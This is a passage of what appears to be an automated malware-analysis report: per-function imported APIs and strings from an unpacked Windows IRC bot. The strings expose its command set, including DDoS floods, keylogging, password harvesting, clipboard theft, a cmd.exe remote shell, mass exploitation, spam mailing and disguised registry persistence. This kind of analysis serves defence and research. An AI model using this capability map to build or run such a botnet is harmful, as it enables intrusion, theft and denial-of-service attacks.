"rb"
</font></pre></td></tr><tr id="sub_4B7150"><td><pre><a name="sub_4B7150"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B7150"><font size=+2>sub_4B7150</a>(a63d)</font>:<font color=darkgreen>
KERNEL32.GetTickCount
USER32.SetTimer
USER32.IsWindow
USER32.PeekMessageA
USER32.TranslateMessage
USER32.DispatchMessageA
KERNEL32.Sleep</font>
<font color=brown></font></pre></td></tr><tr id="sub_4076BB"><td><pre><a name="sub_4076BB"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4076BB"><font size=+2>sub_4076BB</a>(a6ca)</font>:<font color=darkgreen>
WS2_32.socket
WS2_32.htons
WS2_32.ioctlsocket
WS2_32.connect
WS2_32.select
WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_40B81D"><td><pre><a name="sub_40B81D"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40B81D"><font size=+2>sub_40B81D</a>(a7c4)</font>:<font color=darkgreen>
KERNEL32.Sleep</font>
<font color=brown></font></pre></td></tr><tr id="sub_4B38D3"><td><pre><a name="sub_4B38D3"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B38D3"><font size=+2>sub_4B38D3</a>(a853)</font>:<font color=darkgreen>
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection</font>
<font color=brown></font></pre></td></tr><tr id="sub_4B5E35"><td><pre><a name="sub_4B5E35"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B5E35"><font size=+2>sub_4B5E35</a>(a909)</font>:<font color=darkgreen>
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress</font>
<font color=brown>
"KERNEL32.DLL"
"RegisterServiceProcess"
</font></pre></td></tr><tr id="sub_40D792"><td><pre><a name="sub_40D792"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40D792"><font size=+2>sub_40D792</a>(a9bc)</font>:<font color=darkgreen>
ADVAPI32.OpenSCManagerA
NTDLL.RtlGetLastWin32Error
ADVAPI32.OpenServiceA
ADVAPI32.ControlService
ADVAPI32.StartServiceA
ADVAPI32.DeleteService
ADVAPI32.CloseServiceHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_4B5417"><td><pre><a name="sub_4B5417"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B5417"><font size=+2>sub_4B5417</a>(aef0)</font>:<font color=darkgreen>
NTDLL.RtlRestoreLastWin32Error
KERNEL32.LoadLibraryA
NTDLL.RtlGetLastWin32Error
KERNEL32.GetProcAddress</font>
<font color=brown>
"File \"%s\", error %d"
"File \"%s\", function \"%s\""
</font></pre></td></tr><tr id="sub_40DC80"><td><pre><a name="sub_40DC80"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40DC80"><font size=+2>sub_40DC80</a>(afa1)</font>:<font color=darkgreen>
KERNEL32.MultiByteToWideChar</font>
<font color=brown></font></pre></td></tr><tr id="sub_401447"><td><pre><a name="sub_401447"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_401447"><font size=+2>sub_401447</a>(b198)</font>:<font color=darkgreen>
WS2_32.socket
WS2_32.WSAGetLastError
WS2_32.setsockopt
WS2_32.inet_addr
WS2_32.htons
KERNEL32.GetTickCount
WS2_32.sendto
WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_40C1B0"><td><pre><a name="sub_40C1B0"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40C1B0"><font size=+2>sub_40C1B0</a>(b25e)</font>:<font color=darkgreen>
ADVAPI32.RegSetValueExA
ADVAPI32.RegDeleteValueA
ADVAPI32.RegCloseKey</font>
<font color=brown>
"Windos Update"
</font></pre></td></tr><tr id="sub_40D099"><td><pre><a name="sub_40D099"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40D099"><font size=+2>sub_40D099</a>(b2db)</font>:<font color=darkgreen>
KERNEL32.GetDriveTypeA</font>
<font color=brown>
"Cdrom"
"Network"
"Disk"
"Invalid"
"Unknown"
</font></pre></td></tr><tr id="sub_40DF4B"><td><pre><a name="sub_40DF4B"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40DF4B"><font size=+2>sub_40DF4B</a>(b2fb)</font>:<font color=brown>
"Account: %S"
"Full Name: %S"
"User Comment: %S"
"Comment: %S"
"Unknown"
"Administrator"
"User"
"Guest"
"Privilege Level: %s"
"Auth Flags: %d"
"Home Directory: %S"
"Parameters: %S"
"Password Age: %d"
"Bad Password Count: %d"
"Number of Logins: %d"
"Last Logon: %d"
"Last Logoff: %d"
"Logon Server: %S"
"Country Code: %d"
"User's Language: %d"
"Max. Storage: %d"
</font></pre></td></tr><tr id="sub_4CBD81"><td><pre><a name="sub_4CBD81"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4CBD81"><font size=+2>sub_4CBD81</a>(b30a)</font>:<font color=darkgreen>
KERNEL32.GetVersionExA
KERNEL32.GetEnvironmentVariableA
KERNEL32.GetModuleFileNameA</font>
<font color=brown>
"__MSVCRT_HEAP_SELECT"
"__GLOBAL_HEAP_SELECTED"
</font></pre></td></tr><tr id="sub_4B3E69"><td><pre><a name="sub_4B3E69"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B3E69"><font size=+2>sub_4B3E69</a>(b5c5)</font>:<font color=darkgreen>
USER32.GetWindowThreadProcessId
KERNEL32.GlobalAddAtomW
USER32.SendMessageW
KERNEL32.GlobalAddAtomA
USER32.SendMessageA</font>
<font color=brown>
"packed"
"System"
"System"
</font></pre></td></tr><tr id="sub_4B78A3"><td><pre><a name="sub_4B78A3"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B78A3"><font size=+2>sub_4B78A3</a>(b667)</font>:<font color=darkgreen>
KERNEL32.GetCurrentThread
KERNEL32.SetThreadPriority
USER32.WaitForInputIdle
KERNEL32.Sleep
KERNEL32.GetTickCount
KERNEL32.GetModuleHandleA
USER32.RegisterClassA
USER32.CreateWindowExA
USER32.SetTimer
USER32.GetMessageA
USER32.TranslateMessage
USER32.DispatchMessageA</font>
<font color=brown></font></pre></td></tr><tr id="sub_4010B2"><td><pre><a name="sub_4010B2"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4010B2"><font size=+2>sub_4010B2</a>(b6dc)</font>:<font color=darkgreen>
WS2_32.WSAStartup
WS2_32.WSASocketA
WS2_32.setsockopt
WS2_32.htons
WS2_32.htonl
KERNEL32.QueryPerformanceFrequency
KERNEL32.QueryPerformanceCounter
WS2_32.sendto
WS2_32.WSAGetLastError
WS2_32.closesocket
WS2_32.WSACleanup</font>
<font color=brown>
"ddos.syn"
"ddos.ack"
"ddos.random"
</font></pre></td></tr><tr id="sub_4199AA"><td><pre><a name="sub_4199AA"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4199AA"><font size=+2>sub_4199AA</a>(b873)</font>:<font color=darkgreen>
KERNEL32.DeleteFileA
NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_407102"><td><pre><a name="sub_407102"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_407102"><font size=+2>sub_407102</a>(b9de)</font>:<font color=brown>
" %s: %d,"
" Total: %d in %s."
</font></pre></td></tr><tr id="sub_4C7120"><td><pre><a name="sub_4C7120"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4C7120"><font size=+2>sub_4C7120</a>(ba1a)</font>:<font color=brown>
"oversubscribed dynamic bit lengths tree"...
"incomplete dynamic bit lengths tree"
</font></pre></td></tr><tr id="sub_4041CB"><td><pre><a name="sub_4041CB"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4041CB"><font size=+2>sub_4041CB</a>(bb30)</font>:<font color=darkgreen>
WS2_32.send</font>
<font color=brown>
"GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
</font></pre></td></tr><tr id="sub_41510E"><td><pre><a name="sub_41510E"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_41510E"><font size=+2>sub_41510E</a>(bbe1)</font>:<font color=darkgreen>
KERNEL32.GetCurrentProcess
ADVAPI32.OpenProcessToken
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges</font>
<font color=brown></font></pre></td></tr><tr id="sub_4089D4"><td><pre><a name="sub_4089D4"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4089D4"><font size=+2>sub_4089D4</a>(bf38)</font>:<font color=darkgreen>
USER32.IsWindow
USER32.SendMessageA
USER32.DestroyWindow</font>
<font color=brown>
"Window"
</font></pre></td></tr><tr id="sub_40C353"><td><pre><a name="sub_40C353"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40C353"><font size=+2>sub_40C353</a>(c01f)</font>:<font color=darkgreen>
WS2_32.closesocket
KERNEL32.Sleep
WS2_32.recv</font>
<font color=brown>
"\n"
</font></pre></td></tr><tr id="sub_4B60E5"><td><pre><a name="sub_4B60E5"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B60E5"><font size=+2>sub_4B60E5</a>(c1f4)</font>:<font color=darkgreen>
USER32.SetWindowTextA
USER32.GetDlgItem</font>
<font color=brown>
"Loading..."
</font></pre></td></tr><tr id="sub_40B567"><td><pre><a name="sub_40B567"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40B567"><font size=+2>sub_40B567</a>(c686)</font>:<font color=darkgreen>
KERNEL32.SearchPathA
KERNEL32.CreatePipe
KERNEL32.GetCurrentProcess
KERNEL32.CreateProcessA
NTDLL.RtlGetLastWin32Error</font>
<font color=brown>
"cmd.exe"
</font></pre></td></tr><tr id="sub_415179"><td><pre><a name="sub_415179"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_415179"><font size=+2>sub_415179</a>(c7fc)</font>:<font color=darkgreen>
KERNEL32.CreateToolhelp32Snapshot
KERNEL32.Process32First
KERNEL32.Process32Next
KERNEL32.Module32First
KERNEL32.OpenProcess</font>
<font color=brown>
"SeDebugPrivilege"
" %s (%d)"
"SeDebugPrivilege"
</font></pre></td></tr><tr id="sub_405A56"><td><pre><a name="sub_405A56"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_405A56"><font size=+2>sub_405A56</a>(ca09)</font>:<font color=darkgreen>
KERNEL32.GetModuleFileNameA
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
WS2_32.WSACleanup</font>
<font color=brown>
"rb"
</font></pre></td></tr><tr id="sub_4B40C4"><td><pre><a name="sub_4B40C4"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B40C4"><font size=+2>sub_4B40C4</a>(cc48)</font>:<font color=darkgreen>
KERNEL32.GlobalGetAtomNameW
KERNEL32.GlobalDeleteAtom
KERNEL32.GlobalAddAtomW
USER32.SendMessageW
KERNEL32.GlobalGetAtomNameA
KERNEL32.GlobalAddAtomA
USER32.SendMessageA
KERNEL32.GlobalLock
KERNEL32.GlobalUnlock
USER32.PackDDElParam
USER32.PostMessageA
USER32.InSendMessage
USER32.UnpackDDElParam
USER32.FreeDDElParam
KERNEL32.GlobalFree
USER32.DefWindowProcA</font>
<font color=brown>
"packed"
"packed"
"System"
"System"
</font></pre></td></tr><tr id="sub_40D670"><td><pre><a name="sub_40D670"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40D670"><font size=+2>sub_40D670</a>(ce0b)</font>:<font color=darkgreen>
WS2_32.send
KERNEL32.Sleep</font>
<font color=brown>
"NOTICE"
"PRIVMSG"
"%s"
"%s %s :%s\r\n"
</font></pre></td></tr><tr id="sub_4B6828"><td><pre><a name="sub_4B6828"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B6828"><font size=+2>sub_4B6828</a>(ce8c)</font>:<font color=darkgreen>
GDI32.CreatePalette
GDI32.CreateDCA
GDI32.SelectPalette
GDI32.RealizePalette
GDI32.CreateDIBitmap
GDI32.DeleteDC</font>
<font color=brown>
"DISPLAY"
</font></pre></td></tr><tr id="sub_407D53"><td><pre><a name="sub_407D53"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_407D53"><font size=+2>sub_407D53</a>(cf5c)</font>:<font color=darkgreen>
WS2_32.socket
WS2_32.htons
WS2_32.inet_addr
WS2_32.gethostbyname
WS2_32.gethostbyaddr
WS2_32.connect
WS2_32.inet_ntoa
KERNEL32.Sleep
WS2_32.recv
WS2_32.send
NTDLL.RtlGetLastWin32Error
WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_4B7C87"><td><pre><a name="sub_4B7C87"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B7C87"><font size=+2>sub_4B7C87</a>(d01c)</font>:<font color=darkgreen>
KERNEL32.GetExitCodeProcess</font>
<font color=brown></font></pre></td></tr><tr id="sub_409204"><td><pre><a name="sub_409204"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_409204"><font size=+2>sub_409204</a>(d4fa)</font>:<font color=darkgreen>
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap</font>
<font color=brown>
"WINLOGON"
"NWGINA"
"MSGINA"
</font></pre></td></tr><tr id="sub_40EE51"><td><pre><a name="sub_40EE51"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40EE51"><font size=+2>sub_40EE51</a>(d613)</font>:<font color=darkgreen>
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
WS2_32.WSAStartup
WS2_32.gethostbyname
WS2_32.socket
WS2_32.htons
WS2_32.connect
WS2_32.recv
WS2_32.send
WS2_32.closesocket
WS2_32.WSACleanup
KERNEL32.GetTickCount
WS2_32.getsockname
WS2_32.inet_ntoa
WS2_32.inet_addr
KERNEL32.MoveFileA
KERNEL32.CreateProcessA
KERNEL32.GetTempPathA
KERNEL32.DeleteFileA
WS2_32.gethostbyaddr
KERNEL32.GetModuleFileNameA
KERNEL32.GetSystemDirectoryA
DNSAPI.DnsFlushResolverCache</font>
<font color=brown>
" :"
" "
"!"
"PING"
"PONG %s\r\n"
"JOIN %s %s\r\n"
"001"
"005"
"302"
"@"
"433"
"NICK %s\r\n"
"KICK"
"NOTICE %s :%s\r\n"
"JOIN %s %s\r\n"
"NICK"
":%s%s"
"PART"
"QUIT"
"353"
"PART"
"NOTICE %s :%s\r\n"
"PRIVMSG"
"NOTICE"
"332"
"SEND"
"%s"
"%s has just versioned me."
"CHAT"
"%s"
"s1gn1n"
"332"
" :"
"$%d-"
"$%d"
"$me"
"$user"
"$chan"
"$rndnick"
"$server"
"$chr("
")"
"63"
" "
" "
"irc.rndnick"
"rn"
"irc.die"
"irc.di"
"irc.logout"
"lo"
"irc.version"
"ver"
"lockdown.on"
"ld.on"
"lockdown.off"
"ld.off"
"proxy.socks4.on"
"proxy.s4.on"
"proxy.socks4.off"
"Server"
"daemon.rlogin.off"
"Server"
"daemon.web.off"
"Server"
"log.off"
"proxy.redirect.off"
"ddos.off"
"ddos.syn.off"
"ddos.udp.off"
"daemon.tftp.off"
"Server"
"util.findfile.off"
"util.ff.off"
"com.ps.off"
"clone.off"
"Clone"
"Secure"
"root.stop"
"Scan"
"Exploitation"
"root.stats"
"root.st"
"irc.r"
"irc.disconnect"
"irc.d"
"irc.quit"
"irc.q"
"irc.status"
"irc.s"
"irc.id"
"irc.i"
"com.rebewt"
"threads.list"
"threads.l"
"irc.aliases"
"irc.al"
"irc.log"
"irc.lg"
"util.clg"
"com.netinfo"
"com.ni"
"com.sysinfo"
"com.si"
"c00lm4n"
"c00lm4n"
"com.procs"
"com.ps"
"com.harvest"
"com.key"
"com.uptime"
"com.up"
"com.drv"
"com.testdlls"
"com.dll"
"com.opencmd"
"com.ocmd"
"com.ocmd.off"
"Remote shell"
"[CMD]"
"irc.who"
"-[Login List]-"
"<Empty>"
"%d. %s"
"com.getclip"
"com.gc"
"util.farp"
"util.fdns"
"root.currentip"
"root.cip"
"daemon.rlogin.on"
"daemon.rl.on"
"daemon.httpd.on"
"daemon.tftp.on"
"daemon.tf.on"
"com.findpass"
"com.fp"
"root.massexploit"
"root.mass"
"irc.nick"
"irc.n"
"dsho"
"dsho"
"bara"
"bara"
"irc.raw"
"irc.ra"
"threads.kill"
"threads.k"
"clone.quit"
"clone.q"
"clone.rn"
"irc.prefix"
"irc.pr"
"com.open"
"com.o"
"irc.setserve"
"irc.se"
"irc.dns"
"irc.dn"
"com.killprocname"
"com.kpn"
"com.prockillid"
"com.pkid"
"com.delete"
"com.del"
"dcc.get"
"dcc.gt"
"com.filelist"
"com.fl"
"irc.visit"
"irc.v"
"mirc.cmd"
"mirc.cmd"
"com.cmd"
"com.cm"
"com.readfile"
"com.rf"
"sniff"
"on"
"#!S#"
"off"
"com.keylog"
"on"
"file"
"off"
"file"
"#!S#"
"com.net"
"start"
"%s"
"stop"
"pause"
"continue"
"delete"
"share"
"%s"
"user"
"%s"
"send"
"%s"
"com.capture"
"com.cap"
"irc.gethost"
"irc.gh"
"irc.addalias"
"irc.aa"
"irc.privmsg"
"irc.pm"
"irc.action"
"irc.ac"
"irc.cycle"
"irc.cy"
"irc.mode"
"irc.m"
"clone.raw"
"clone.ra"
"clone.mode"
"clone.m"
"clone.nick"
"clone.ni"
"clone.join"
"clone.j"
"clone.part"
"clone.p"
"irc.repeat"
"irc.rp"
"irc.delay"
"irc.de"
"up50"
"up50"
"com.execute"
"com.e"
"findfile"
"ff"
"com.rename"
"com.mv"
"ddos.icmp"
"ddos.ic"
"clone.make"
"clone.start"
"ddos.syn"
"ddos.ack"
"ddos.random"
"ddos.synf"
"v!st4w1n"
"v!st4w!n"
"daemon.redirect"
"daemon.rd"
"root.ps"
"clone.pm"
"clone.action"
"clone.ac"
"root.start"
"root.s"
"ddos.udpf"
"u"
"ddos.pingflood"
"ddos.pingf"
"p"
"ddos.tcpf"
"util.email"
" "
"_"
"helo $rndnick\nmail from: <%s>\nrcpt to: "...
"util.httpcon"
"util.hcon"
"ftp.upload"
"%s\\%i%i%i.dll"
"ab"
"open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
"-s:%s"
"ftp.exe"
"open"
"syn"
"ack"
"random"
"Spoofed"
"Normal"
"ICMP.dll not available"
"#!S#"
"Sequential"
"[%s] * %s %s"
"[%s] <%s> %s"
"botid"
"%s%s.exe"
"332"
"%s %s %s :%s"
"332"
"repeat"
"%s %s %s :%s"
"PART %s"
"%s\r\n"
"JOIN %s %s"
"NICK %s"
"%s\r\n"
"MODE %s"
"%s\r\n"
"%s\r\n"
"MODE %s\r\n"
"332"
"JOIN %s %s\r\n"
"%s %s %s :%s"
"screen"
"drivers"
"frame"
"video"
"r"
"\n"
"%s"
"open"
"NICK %s"
"QUIT :later\r\n"
"all"
"%s\r\n"
"JOIN %s %s\r\n"
"NICK %s\r\n"
"#!S#"
"#!S#"
"Sequential"
"full"
"%s"
"sub"
"botid"
"QUIT :%s\r\n"
"QUIT :later\r\n"
"QUIT :disconnecting\r\n"
"QUIT :reconnecting\r\n"
"secure"
"sec"
"Unsecuring"
"h4cker tool"
"332"
"NICK %s\r\n"
"!"
"~"
"b0tn3trx"
"NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
"NOTICE %s :You've been logged.\r\n"
"NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
"NOTICE %s :You've been logged.\r\n"
"b0tn3trx"
"USERHOST %s\r\n"
"+xi"
"MODE %s %s\r\n"
"JOIN %s %s\r\n"
</font></pre></td></tr><tr id="sub_41FE28"><td><pre><a name="sub_41FE28"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_41FE28"><font size=+2>sub_41FE28</a>(d8fa)</font>:<font color=darkgreen>
KERNEL32.SetUnhandledExceptionFilter</font>
<font color=brown></font></pre></td></tr><tr id="sub_4B67B0"><td><pre><a name="sub_4B67B0"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B67B0"><font size=+2>sub_4B67B0</a>(db07)</font>:<font color=darkgreen>
KERNEL32.GetCurrentThreadId
USER32.DestroyWindow
USER32.PostMessageA
USER32.IsWindow
KERNEL32.Sleep</font>
<font color=brown></font></pre></td></tr><tr id="sub_4C7A96"><td><pre><a name="sub_4C7A96"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4C7A96"><font size=+2>sub_4C7A96</a>(dd13)</font>:<font color=brown>
"oversubscribed literal/length tree"
"incomplete literal/length tree"
"oversubscribed distance tree"
"incomplete distance tree"
"empty distance tree with lengths"
</font></pre></td></tr><tr id="sub_402DCE"><td><pre><a name="sub_402DCE"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_402DCE"><font size=+2>sub_402DCE</a>(dd7f)</font>:<font color=darkgreen>
KERNEL32.TransactNamedPipe
WS2_32.socket
WS2_32.htons
WS2_32.inet_addr
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
KERNEL32.Sleep</font>
<font color=brown></font></pre></td></tr><tr id="sub_40B38B"><td><pre><a name="sub_40B38B"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40B38B"><font size=+2>sub_40B38B</a>(dd8a)</font>:<font color=darkgreen>
KERNEL32.Sleep
WS2_32.send</font>
<font color=brown>
"PRIVMSG %s :%s\r"
"%s"
</font></pre></td></tr><tr id="sub_40D62A"><td><pre><a name="sub_40D62A"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40D62A"><font size=+2>sub_40D62A</a>(de2e)</font>:<font color=darkgreen>
WS2_32.send</font>
<font color=brown></font></pre></td></tr><tr id="sub_4CCBF9"><td><pre><a name="sub_4CCBF9"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4CCBF9"><font size=+2>sub_4CCBF9</a>(df93)</font>:<font color=darkgreen>
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_40A96A"><td><pre><a name="sub_40A96A"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40A96A"><font size=+2>sub_40A96A</a>(e182)</font>:<font color=darkgreen>
MSVCRT._tolower</font>
<font color=brown></font></pre></td></tr><tr id="sub_4B3F59"><td><pre><a name="sub_4B3F59"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B3F59"><font size=+2>sub_4B3F59</a>(e18f)</font>:<font color=darkgreen>
KERNEL32.GetModuleHandleA
USER32.LoadCursorA
USER32.RegisterClassW
USER32.CreateWindowExW
USER32.RegisterClassA
USER32.CreateWindowExA</font>
<font color=brown>
"SwPDDE"
"SwPDDE"
</font></pre></td></tr><tr id="sub_40EB71"><td><pre><a name="sub_40EB71"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40EB71"><font size=+2>sub_40EB71</a>(e343)</font>:<font color=darkgreen>
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.closesocket
KERNEL32.Sleep</font>
<font color=brown></font></pre></td></tr><tr id="sub_421D73"><td><pre><a name="sub_421D73"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_421D73"><font size=+2>sub_421D73</a>(e3a0)</font>:<font color=brown>
"invalid string position"
</font></pre></td></tr><tr id="sub_415674"><td><pre><a name="sub_415674"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_415674"><font size=+2>sub_415674</a>(e4e3)</font>:<font color=darkgreen>
WS2_32.recv</font>
<font color=brown></font></pre></td></tr><tr id="sub_407FD7"><td><pre><a name="sub_407FD7"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_407FD7"><font size=+2>sub_407FD7</a>(e4ed)</font>:<font color=darkgreen>
WS2_32.htons
WS2_32.socket
WS2_32.bind
WS2_32.listen
WS2_32.accept
WS2_32.inet_ntoa
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_409701"><td><pre><a name="sub_409701"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_409701"><font size=+2>sub_409701</a>(e59a)</font>:<font color=darkgreen>
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_41546F"><td><pre><a name="sub_41546F"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_41546F"><font size=+2>sub_41546F</a>(e96f)</font>:<font color=darkgreen>
WS2_32.select
WS2_32.closesocket
WS2_32.recv
WS2_32.getpeername
WS2_32.WSAGetLastError
WS2_32.gethostbyaddr
WS2_32.inet_ntoa
WS2_32.send
NTDLL.RtlGetLastWin32Error</font>
<font color=brown>
"Permission denied\n"
</font></pre></td></tr><tr id="sub_40C25B"><td><pre><a name="sub_40C25B"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40C25B"><font size=+2>sub_40C25B</a>(e98c)</font>:<font color=brown>
"rb"
</font></pre></td></tr><tr id="sub_4CEEC3"><td><pre><a name="sub_4CEEC3"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4CEEC3"><font size=+2>sub_4CEEC3</a>(ea26)</font>:<font color=darkgreen>
NTDLL.RtlAllocateHeap
NTDLL.RtlReAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_4CCD3D"><td><pre><a name="sub_4CCD3D"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4CCD3D"><font size=+2>sub_4CCD3D</a>(ea79)</font>:<font color=darkgreen>
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_40981A"><td><pre><a name="sub_40981A"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40981A"><font size=+2>sub_40981A</a>(eb03)</font>:<font color=darkgreen>
NTDLL.RtlGetLastWin32Error
WININET.InternetOpenA</font>
<font color=brown>
"kernel32.dll"
"SetErrorMode"
"CreateToolhelp32Snapshot"
"Process32First"
"GetDiskFreeSpaceExA"
"GetLogicalDriveStringsA"
"SearchPathA"
"QueryPerformanceCounter"
"QueryPerformanceFrequency"
"RegisterServiceProcess"
"user32.dll"
"SendMessageA"
"FindWindowA"
"IsWindow"
"GetClipboardData"
"CloseClipboard"
"GetAsyncKeyState"
"GetKeyState"
"GetWindowTextA"
"GetForegroundWindow"
"advapi32.dll"
"RegCreateKeyExA"
"RegSetValueExA"
"RegQueryValueExA"
"RegDeleteValueA"
"RegCloseKey"
"OpenProcessToken"
"LookupPrivilegeValueA"
"AdjustTokenPrivileges"
"OpenSCManagerA"
"OpenServiceA"
"ControlService"
"CloseServiceHandle"
"EnumServicesStatusA"
"IsValidSecurityDescriptor"
"GetUserNameA"
"gdi32.dll"
"CreateDCA"
"CreateDIBSection"
"CreateCompatibleDC"
"GetDIBColorTable"
"SelectObject"
"BitBlt"
"DeleteDC"
"DeleteObject"
"ws2_32.dll"
"WSAStartup"
"WSASocketA"
"WSAAsyncSelect"
"__WSAFDIsSet"
"WSAIoctl"
"WSAGetLastError"
"WSACleanup"
"socket"
"ioctlsocket"
"connect"
"inet_ntoa"
"inet_addr"
"htons"
"htonl"
"ntohs"
"ntohl"
"send"
"sendto"
"recv"
"recvfrom"
"bind"
"select"
"listen"
"accept"
"setsockopt"
"getsockname"
"gethostname"
"getpeername"
"closesocket"
"wininet.dll"
"InternetGetConnectedState"
"InternetGetConnectedStateEx"
"HttpOpenRequestA"
"HttpSendRequestA"
"InternetConnectA"
"InternetOpenUrlA"
"InternetCrackUrlA"
"InternetReadFile"
"InternetCloseHandle"
"Mozilla/4.0 (compatible)"
"icmp.dll"
"IcmpCreateFile"
"IcmpCloseHandle"
"IcmpSendEcho"
"netapi32.dll"
"NetShareAdd"
"NetShareDel"
"NetShareEnum"
"NetScheduleJobAdd"
"NetApiBufferFree"
"NetRemoteTOD"
"NetUserAdd"
"NetUserDel"
"NetUserEnum"
"NetUserGetInfo"
"NetMessageBufferSend"
"dnsapi.dll"
"DnsFlushResolverCache"
"DnsFlushResolverCacheEntry_A"
"iphlpapi.dll"
"DeleteIpNetEntry"
"mpr.dll"
"WNetAddConnection2A"
"WNetAddConnection2W"
"WNetCancelConnection2A"
"WNetCancelConnection2W"
"shell32.dll"
"SHChangeNotify"
"odbc32.dll"
"SQLDriverConnect"
"SQLAllocHandle"
"avicap32.dll"
"capCreateCaptureWindowA"
"capGetDriverDescriptionA"
</font></pre></td></tr><tr id="sub_40C8B6"><td><pre><a name="sub_40C8B6"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40C8B6"><font size=+2>sub_40C8B6</a>(ebb2)</font>:<font color=darkgreen>
KERNEL32.GetSystemDirectoryA
WS2_32.recv
WS2_32.htonl
WS2_32.send
WS2_32.closesocket</font>
<font color=brown>
"%s%s"
"a+b"
